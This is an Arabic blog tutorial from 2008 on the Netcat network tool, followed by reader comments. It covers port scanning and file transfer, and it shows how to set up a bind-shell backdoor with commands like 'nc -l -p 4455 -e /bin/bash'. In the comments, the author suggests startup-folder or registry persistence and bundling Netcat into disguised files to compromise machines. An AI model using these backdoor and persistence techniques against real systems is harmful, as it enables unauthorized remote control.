شرح أداة Netcat - The Swiss Army Knife

شرح أداة Netcat – The Swiss Army Knife

كتب بتاريخ: Jan 22nd, 2008 | بواسطة: عبدالمهيمن

السلام عليكم ورحمة الله وبركاته

Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools

استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها

فحص المنافذ المفتوحة في السيرفر

تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر

nc -v -w1 SERVER-IP -z FromPort-ToPort

أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ

مثال على ذلك

nc -v -w1 64.233.183.147 -z 1-100

ولفحص أكثر من نطاق منافذ نستعمل الأمر

nc -v -w1 -z 64.233.183.147 -z 1-100 400-500

ملاحظة: 64.233.183.147 هو IP موقع Google

نقل الملفات بين جهازك والسيرفر

من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل

nc SERVER-IP PORT < FILE

ونطبق الأمر في الجهاز المستقبل

nc -l -p PORT > FILE

مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا

nc 192.168.0.45 5555 < data.txt

أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر

nc -l -p 5555 > data.txt

جعل الـ Netcat تعمل كـ Backdoor

هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر

nc -l -p PORT -e PROGRAM

مع اضافة -d و -L في ويندوز ليصبح الأمر

nc -l -p PORT -d -e PROGRAM -L

مثال على هذه الخاصية نقوم بتطبيق الأمر

nc -l -p 4455 -e /bin/bash

على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل

nc -l -p 4455 -e -d cmd.exe -L

وللاتصال بالسيرفر نطبق الأمر

nc -v -n SERVER-IP 4455

وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر

nc -h

تحميل أداة Netcat لنظام لينوكس | تحميل أداة Netcat لنظام ويندوز

ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان

أرجو أن ينال الشرح اعجابكم
تحياتي Br4v3-H34r7.

التصنيف: Hacking & Security | عدد المشاهدات 18,714 | عدد التعليقات 52

رابط التعقيبات التعليقات RSS

أرسل الموضوع

التعليقات

1- الطارق كتب بتاريخ: 22 Jan 2008 الساعة: 6:27 PM

فعلاً اداة النت كات جبارة وهي تختصر الكثير من الوقت

يعطيك العافية على الموضوع واستمر بارك الله فيك
2- Br4v3-H34r7 كتب بتاريخ: 22 Jan 2008 الساعة: 6:49 PM

يا هلا فيك أخوي طارق الله يعافيك
وماشاء الله عليك دائما منور المدونة
3- محمد كتب بتاريخ: 21 Mar 2008 الساعة: 5:53 PM

شكرا لك
4- NsA كتب بتاريخ: 02 Apr 2008 الساعة: 6:18 PM

موقعك بدون اي مجامله في غاية الروعه

واصل يابطل

وربي يوفقك دنيا واخره
5- thrkam كتب بتاريخ: 08 Apr 2008 الساعة: 7:26 AM

مشكور يا جميل وانة استخدمة للنيت ورك حيث يقزم بسجب الماكات شكرا ليك باي
6- CASATAWY كتب بتاريخ: 30 Apr 2008 الساعة: 5:20 AM

بصراحة الأداة ممتازة بس ماينفعش تستخدم باكدور لأن علشان نستخدمها لازم الضحية يفعلها وبالتالى صعب اقوله تعالى علشان اخترق جهازك !!!!!!!!!

واشكرك على المدونة ممتازة
7- Br4v3-H34r7 كتب بتاريخ: 30 Apr 2008 الساعة: 1:16 PM

@محمد: العفو وان شاء الله تكون استفدت

@NsA: شكرا أخوي على كلامك الجميل وعلى الدعوات الأجمل وان شاء الله يوفقنا أجمعين

@thrkam: ان شاء الله يكون عجبك الموضوع وهلا فيك في المدونة

@CASATAWY: طبعا أنت مش حتخترق فيها جهاز! هذا شغل أطفال وفي برامج أفضل لهذه المهمة لكن netcat ممكن تستخدم في اختراق السيرفرات والحصول على Shell ويمكن استخدامها في اختراق الأجهزة أيضا اذا استعنا بملف bat ينفذ الأوامر وبرمجنا برنامج بالفيجول بيزك مثلا يدمج الملفين وسابقا شرحت الطريقة كاملة بالفيديو ولكن قبل ما أفتح المدونة.. ممكن أرجع أعيد الشرح وأكتب عنه موضوع جديد قريبا.. دمت بود
8- learn&learn كتب بتاريخ: 26 May 2008 الساعة: 1:56 PM

والله اخي ما ارعف كيف اجازيك بس استمر جزاك الله الف خير واي شي تحتاجه ان شاء الله احنا موجودين بس ما اعتقد انت تحتاج شي يااستاذ
9- Br4v3-H34r7 كتب بتاريخ: 27 May 2008 الساعة: 11:57 AM

أخي learn&learn لاداعي لكملة “استاذ” فماحدا استاذ هنا وماحدا ولد كذلك شكرا على عرضك واذا لزمني شيء بيوم من الأيام سأخبرك
10- مشمش كتب بتاريخ: 01 Jun 2008 الساعة: 7:14 PM

برنامج النت كت مش عارف احمله ممكن شرح التحميل منين وشكرا
11- anonymous كتب بتاريخ: 19 Jun 2008 الساعة: 4:04 PM

عندي سؤال و هو كيف أرفع له nc من دون أن يحس مع تشغيلها في الخلفية .
12- Br4v3-H34r7 كتب بتاريخ: 19 Jun 2008 الساعة: 4:32 PM

@anonymous: بصراحة أخي لم أفهم سؤلك لأنه غير واضح! تريد أن ترفع Netcat لأين؟ سيرفر؟ وتشغلها دون أن يشعر بها الـ root؟ ستحتاج لاستغلال ثغرة remote لتقوم بكل ذلك وتفتح منفذ في السيرفر ثم تستخدم الـ Netcat للاتصال بالمنفذ وليس رفعها للسيرفر! وطبعا لا أضمن عدم شعور الأدمن
13- KING SABRI كتب بتاريخ: 22 Jun 2008 الساعة: 3:56 AM

جميل يا عبده

طبعا أكثر الناس مايعرفون غير
nc -v -l -p 80
14- unary كتب بتاريخ: 03 Aug 2008 الساعة: 1:18 AM

شرح جميل منك أخي و فعلا اداة netcat رائعة و اتبتت فاعليتها في مجال ال Hacker
و هناك تطوير للاداة باسم cryptcat و الذي يتميز بخاصية التشفير .
تحياتي لك أخي .
15- Br4v3-H34r7 كتب بتاريخ: 06 Aug 2008 الساعة: 1:18 AM

@KING SABRI: أنت أجمل أخي صبري و ان شاء الله تكون استفدت من الشرح

@unary: ردك أجمل أخي.. أداة netcat من أقوى الأدوات و أغلبنا يتعامل معها حتى الآن خصوصا أن استخداماتها متعددة جدا و تفيدنا بكثير من الأمور, بالنسبة لـ cryptcat أتذكر أني سمعت بها أو بشيء مماثل لكني لم أجربها بصراحة فاستخدام VPN يفي بالغرض
16- خالد كتب بتاريخ: 25 Aug 2008 الساعة: 9:16 PM

وعليكم السلام
اخوي فعلاً الاداه جميله لكن صعوبتها في الاوامر

لنفرض مثلن اني اخترق جهاز واحد عن طريق الشل كود

وقدرت ادخل جهازه بس عندي مشكله وهي كيف ارفع مثلاً باتش لجهاز الضحيه

وكيف استطيع اخذ ملف من جهازي الضحيه الي جهازي

واخير مثلن ابي اسحب باتش من النت لحهازي الضحيه

ياليت تقولي الاوامر !

ومعليش اذا طولت
17- Br4v3-H34r7 كتب بتاريخ: 27 Aug 2008 الساعة: 12:49 AM

أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!
18- الرومانسي الرقيق كتب بتاريخ: 31 Aug 2008 الساعة: 10:41 PM

اخوي الغالي اولن مشكور علي هذا البرنامج و الله ما قصرت يا بعد عيني بس عندي سوئل
1- حبي النظام الباك تراك 3 الفاينل يحتوي علي هذا الادات هي نفس عمل هذا الادات الموجود اهني ام يختلف عمل تلك الادات عن هذة ارجو ان فتهمت قصدي و مشكور مرة اخري الغالي علي هذا البرنامج و ان شاء الله نحو الامام و التقدم و تحياتي اليك و الي الجميع
19- Br4v3-H34r7 كتب بتاريخ: 01 Sep 2008 الساعة: 12:44 AM

أخي أجل الأداة هي نفسها الموجودة في توزيعة الباك تراك و حسب معرفتي يوجد أداة netcat واحدة لكن تختلف الاصدارات…
20- خالد كتب بتاريخ: 11 Sep 2008 الساعة: 10:59 AM

أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!

مشكور علي الرد
تفضل اخوي
نظام التشغيل وندوز الاستغلال عن طريق الشل كود الصلاحيات لا اعلم كيف اطلعها

اذا ماعرفت وش الامر الصحيح
ياليت تضع جميع اوامر النت كات لرفع ملف بجميع الصلاحيات
21- Br4v3-H34r7 كتب بتاريخ: 11 Sep 2008 الساعة: 1:40 PM

أخي لاظهار جميع أوامر النت كات استخدم آخر أمر مذكور في الشرح! و الأوامر السابقة تشرح بعض استخدامات النت كات. يعني الأوامر أمامك و أنت تقلي أضعها لك,, شيء غريب!!
22- SaUdi~Net كتب بتاريخ: 20 Oct 2008 الساعة: 10:43 PM

جمييييل ،، يآبطل ،، اداه جميله من شخص ارووووع ،،

تحيآتي لك
23- عبد الحميد كتب بتاريخ: 20 Nov 2008 الساعة: 8:32 AM

السلام عليك أخي .. أنا عندي البرنامج .. ولكن لا أعرف أين بالضبط يتم تنفيذ هذه الأوامر التي كتبتها .. حيث أنه لا يوجد خانه لكتابة هذه الأوامر .. اعذرني لجهلي.. ولكن إذا كان فيها تعب ممكن شرح مدعم بالصور لهذه الأوامر .. .. اسف للإطالة ولو الشرح موجود مسبقاً يا ريت تنوه بالإشارة لإسم الموضوع لأبحث عنه.. جزاك الله كل خير … ويا ريت لو يكون في شرح عن الشبكات وأوامر الشبكات .. عاوزين نتعلم حاجة مفيدة بقى
24- Offensive كتب بتاريخ: 20 Nov 2008 الساعة: 12:46 PM

How To make it run as a service With windows Machine ?!!

I mean It run after restart The computer ?!!
25- Br4v3-H34r7 كتب بتاريخ: 20 Nov 2008 الساعة: 7:42 PM

@SaUdi~Net: تسلم أخي.. ان شاء الله يكون الموضوع نال اعجابك وأهلا بك في المدونة.

@عبد الحميد: وعليكم السلام.. أخي الشرح واضح جدا ولايحتاج لصور لتتعلم كيفية تطبيقه!! كل ماعليك هو تنفيذ هذه الأوامر من الـ cmd اذا كان نظامك Windows مع مراعاة تنفيذ الأمر في نفس مجلد البرنامج أو نسخ الأداة لمجلد system32 الموجود داخل النظام.. تحياتي!

@Offensive: There is a different between run the program as windows service or make it run when windows startup! anyway you can use .bat file and add it to the startup folder or to the registry. please use Arabic language next time!!
26- knari كتب بتاريخ: 28 Nov 2008 الساعة: 5:45 PM

الله يوفقك دنيا واخره

والله افضل مدونه رايتهاااااااااااا
27- DrEaDFuL كتب بتاريخ: 23 Dec 2008 الساعة: 9:51 PM

السلام عليكم ورحمة الله وبركاته

اولا شكرا اخي على الشرح الوافي والتام

بس عندي سؤال انا حملت الادات تبع الوينداوز ثم وضعتها بsystem32 وعملت امر cmd بس لما اجي اطبق امر nc ياتيني الرد التالي
Access is denied.
رجاءا شرح لكيفية تنزبلها على الجهاز ثم تنصيبها ثم الاتصال اذا انا فاهم استعمالها خطا

وربي يجازيك كل خير
28- Br4v3-H34r7 كتب بتاريخ: 24 Dec 2008 الساعة: 12:48 AM

@knari: شكرا أخي على دعواتك الجميلة.. أتمنى أن تكون استفدت من الموضوع وأهلا بك في المدونة.

@DrEaDFuL: وعليكم السلام أخي.. لا تحتاج لتنصيب الأداة ويمكنك استخدامها بشكل مباشر من cmd بعد وجودك بنفس مسار الأداة دون الحاجة لنسخها لمجلد system32 وبالنسبة لرسالة Access is denied لا أعلم ما السبب بصراحة لكن أظن أنك تعمل على النظام بحساب user وليس Administrator! بالتوفيق…
29- محمود كتب بتاريخ: 31 Dec 2008 الساعة: 11:44 PM

:yesبرنامج كتير جميل
30- ممنوع كتب بتاريخ: 23 Mar 2009 الساعة: 6:27 AM

تسلم حبيب قلبي

في إنتظار الشرح
31- طارق موسي كتب بتاريخ: 29 Mar 2009 الساعة: 2:31 PM

انا اليوم بعد ما تعبت في الهاكينج و البحث عرفت المدونه دي بس الحمد لله اني عرفتها اصلا و مشكور اخي
32- بنت العراق كتب بتاريخ: 12 Apr 2009 الساعة: 2:08 AM

السلام عليكم
شكرا جزيلا اخي العزيز على الشرح..انت فعلا ساعدتني بفهم البرنامج
وان شاء الله ححاول اكون مفيدة واضيف استخدام اخر بعد اكمال الاطلاع والتنفيذ
وفقك ربي
33- so9or كتب بتاريخ: 06 May 2009 الساعة: 10:02 PM

تسلم والله على الدرس الجميل الاكثر من رائع
34- mrloong كتب بتاريخ: 11 May 2009 الساعة: 12:18 PM

شـكــ وبارك الله فيك ـــرا لك … لك مني أجمل تحية .
35- HaCk-dz كتب بتاريخ: 12 Jul 2009 الساعة: 12:41 PM

السسلام عليكم

اخي عبد المهيمـن ، انا جربت متـل ما قلـت بالششرح لكـن طلع لـى هاد المسسج !!!

inverse host lookup failed: h_errno 11004: NO_DATA

وهآذ
(UNKNOWN) [Ip server] 97 (?): TIMEDOUT
يعني 97 هـو البورت !!

انتظر الاجابـه

تحيآتـى
36- عبدالمهيمن كتب بتاريخ: 12 Jul 2009 الساعة: 4:17 PM

@HaCk-dz: رسالة inverse host lookup failed تعني وجود مشكلة بالـ DNS الرسالة التالية تعني عدم تمكن الأداة من الاتصال مع الـ IP الذي حددته عن طريق المنفذ 97.
37- pentest كتب بتاريخ: 29 Jul 2009 الساعة: 5:37 AM

مشكور اخوي القدير عبد المهمين وان وما شاء الله مدونة احلى من اي مدونة اخرى اشكرك على فتخها واستفادة الجميع منها وشكرا على الشرح
38- Absolute Beginner كتب بتاريخ: 10 Aug 2009 الساعة: 12:02 AM

بارك الله فيك اخي

شرح رائع ومواضيعك في القمة

واصل بدون فواصل
39- Dr.XxS كتب بتاريخ: 20 Oct 2009 الساعة: 5:55 PM

كفوو والله يا ابن البلد

مشكور حبيبي عبدالمهيمن

مدونة رائعه والله
40- TOP SAT 13 كتب بتاريخ: 03 Nov 2009 الساعة: 7:58 PM

السلام عليكم
شرح ممتاز لكن ناقصه شيئ وهو الاتصال بالسرفر وتخطي المشاكل
انا لدي مشاكل عندما اتصل
لا استطيع تضهر فقط TIMEDOUT او OPEN و فقط
41- flat كتب بتاريخ: 11 Nov 2009 الساعة: 12:49 AM

عاشو على هذا الشرح >>>>>>>>>>>>العراقي
42- SyRiAn_34G13 كتب بتاريخ: 26 Nov 2009 الساعة: 8:55 AM

غريب و الله
انا منزمان ما شفت شرح رائع متل هالشرح
مشكور أخ بريف
و انشالله نشوف المزيدمن ابداعاتك
^_^
43- HTML كتب بتاريخ: 30 Nov 2009 الساعة: 8:29 PM

مشكور اخوي على الشرح الوافي

اجعلو شعاركم لا للبرايفت

سلامي
44- Talal كتب بتاريخ: 11 Jan 2010 الساعة: 3:53 PM

انت راجل باشا و رئيس قسم, بجد حاولت افهم من مواقع اجنبيه وعربية بس اللى فهمنى مقالك ده, مع انك كاتبو من سنتين بس شوف العمل الطيب بيقعد للشخص و الدعوة انشالله تكون وصلتلك يا جميل
45- احمد الحارسي كتب بتاريخ: 01 Feb 2010 الساعة: 5:26 PM

انا اخ محمد الحارسي فيى العراق صديقك اريد ان اكون صديقك ولدي كثي لاقول لك وانشاءالله سيستفيد كلنا من الاخر مع تحياتي لك
46- kasper-ksa كتب بتاريخ: 10 Feb 2010 الساعة: 3:07 AM

اشكرك حبيبي عبد المهيمن ووفقك الله لما يحبه ويرضاة ننتضر المزيد
47- 4LG£rI4N-H4CKER كتب بتاريخ: 08 Mar 2010 الساعة: 5:22 PM

شرح صافي وافي
48- DZ-H-B كتب بتاريخ: 11 Mar 2010 الساعة: 2:58 PM

ربي يجازيك خويا لعزيز ….. افضل المدونات لي زرتها بحياتي شكرا اخي
لو تتفضل و تساهم في رفع مستوى اخوانك بوضع موضوع عن اختراق جهاز مجهول على الشبكة بشكل مباشر ……..كل التوفيق خي
49- عبدالرحمن كتب بتاريخ: 03 Apr 2010 الساعة: 12:44 AM

دمت للتاريخ محرابا مهابا
وفقك الله اخي
بس عمرك 19

ربنا يديمكl لدينك و لاهلك ووطنك وامتك
50- amusgame كتب بتاريخ: 05 May 2010 الساعة: 3:29 PM

شكرا جزيلا لك شرح رائع جدا
51- Jawad كتب بتاريخ: 07 Aug 2010 الساعة: 2:50 PM

سلام عليكم
اولا موقع رائع وما شاء الله عليك
ثانيا انا وضعت ملف بفولدر السي باسم nc
و حملت الملف nc.exe داخل هذا الفولدر
اي اصيح لدينا
c:\nc\nc.exe
ودخلت عليه من الدوس و كذلك لم تعمل الاوامر
اكون مشكور اذا تقدر تساعدني و ترشدني الى الخطأ
اخوك جواد من لبنان
سلام عليكم
52- عبدالمهيمن كتب بتاريخ: 08 Aug 2010 الساعة: 1:34 PM

@Jawad: لا أعلم ما المشكلة! ممكن تكون من الإصدار الذي تستخدمه؟ أنا أستخدم GNU Netcat على نظام Linux بالنسبة لويندوز فإبحث في Google على Windows Netcat وحمّل الإصدار الخاص بنظام ويندوز ثم أعد التجربة.